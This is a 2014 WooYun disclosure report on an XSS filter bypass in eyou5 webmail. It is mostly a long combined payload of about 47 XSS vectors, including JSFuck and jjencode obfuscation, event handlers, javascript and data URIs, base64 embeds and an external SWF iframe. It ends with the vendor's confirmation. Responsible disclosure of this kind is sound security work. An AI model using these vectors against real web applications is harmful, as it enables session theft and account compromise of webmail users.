乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-06-30: 细节已通知厂商并且等待厂商处理中 2014-07-01: 厂商已经确认,细节仅向厂商公开 2014-07-04: 细节向第三方安全合作伙伴开放 2014-08-25: 细节向核心白帽子及相关领域专家公开 2014-09-04: 细节向普通白帽子公开 2014-09-14: 细节向实习白帽子公开 2014-09-28: 细节向公众公开
RT
以前老版本一直对XSS没啥防御,也就没好意思发。最近看手头上的一个eyou信箱升级到eyou5了。发现新版本开始对XSS进行过滤了就测试了一下,发现了一点问题。#1测试单个XSS攻击向量,如:
<img src=x onerror=alert(1)>
还是可以抵挡的住的。#2不过情况稍微复杂一些,你们的过滤规则就招架不住了。如:
<script>alert(0)</script><script>confirm(1)</script><script>prompt(2)</script><script>\u0061\u006C\u0065\u0072\u0074(3)</script> <script>[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()</script><script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.$_$+")"+"\"")())();</script><script>+alert(6)</script> <script test>alert(7)</script> <script>alert(/8/)</script><script src=data:text/javascript,alert(9)></script><script src=data:text/javascript,alert(10)></script><script>alert(String.fromCharCode(49,49))</script><script>alert(/12/.source)</script><script>setTimeout(alert(13),0)</script><script>document['write'](14);</script><anytag onmouseover=alert(15)>M<anytag onclick=alert(16)>M<a onmouseover=alert(17)>M<a onclick=alert(18)>M<a href=javascript:alert(19)>M<button/onclick=alert(20)>M<form><button formaction=javascript:alert(21)>M<form/action=javascript:alert(22)><input/type=submit><form onsubmit=alert(23)><button>M<img src=x onerror=alert(24)><body/onload=alert(25)><body onscroll=alert(26)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus><iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																27
																	%29></iframe><iframe src="http://0x.lv/xss.swf"></iframe> <iframe/onload=alert(document.domain)></iframe><IFRAME SRC="javascript:alert(29);"></IFRAME><meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2830%29%3C%2F%73%63%72%69%70%74%3E"><object data=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+></object><object data="javascript:alert(document.domain)"><marquee onstart=alert(30)></marquee><isindex type=image src=1 onerror=alert(31)><isindex action=javascript:alert(32) type=image><input onfocus=alert(33) autofocus><input onblur=alert(34) autofocus><input autofocus><INPUT TYPE="IMAGE" SRC=x onerror=alert(35)><select onfocus=alert(36) autofocus><textarea onfocus=alert(37) autofocus></textarea><keygen onfocus=alert(38) autofocus> <FRAMESET><FRAME SRC="javascript:alert(document.domain);"></FRAMESET><frameset onload=alert(40)><embed src="data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+"></embed> <embed src=javascript:alert(document.domain)> <math href="javascript:alert(45)">M<math> <maction actiontype="" xlink:href="javascript:alert(46)">M<math xlink:href=javascript:alert(47)>M
面对较为复杂的场景时,你们的过滤规则就招架不住了。
因为是过滤器设计上的问题,所以我相信你们所有的版本都存在这个缺陷。如果重现上有困难可以发乌云短消息联系我。
重整过滤规则
危害等级:中
漏洞Rank:5
确认时间:2014-07-01 17:58
经查存在某些版本中,之前已有其他平台提交过类似问题,已有解决方案,我们将会与客户联系,尽快修正,非常感谢提供!
暂无